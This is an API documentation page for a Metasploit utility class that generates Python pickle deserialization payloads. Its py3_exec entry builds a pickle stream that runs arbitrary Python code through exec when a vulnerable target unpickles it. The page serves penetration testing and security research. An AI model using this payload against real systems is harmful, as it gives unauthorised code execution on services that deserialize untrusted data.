Class: Msf::Util::PythonDeserialization

Inherits:
Object
  • Object
show all
Defined in:
lib/msf/util/python_deserialization.rb

Overview

Python deserialization class

Constant Summary collapse

PAYLOADS =

That could be in the future a list of payloads used to exploit the Python deserialization vulnerability.

{
  # this payload will work with Python 3.x targets to execute Python code in place
  py3_exec: proc do |python_code|
    escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
    %|c__builtin__\nexec\np0\n(V#{escaped}\np1\ntp2\nRp3\n.|
  end
}

Class Method Summary collapse

Class Method Details

.payload(payload_name, command = nil) ⇒ Object

Raises:

  • (ArgumentError)


17
18
19
20
21
22
# File 'lib/msf/util/python_deserialization.rb', line 17

def self.payload(payload_name, command = nil)

  raise ArgumentError, "#{payload_name} payload not found in payloads" unless payload_names.include? payload_name.to_sym

  PAYLOADS[payload_name.to_sym].call(command)
end

.payload_namesObject



24
25
26
# File 'lib/msf/util/python_deserialization.rb', line 24

def self.payload_names
  PAYLOADS.keys
end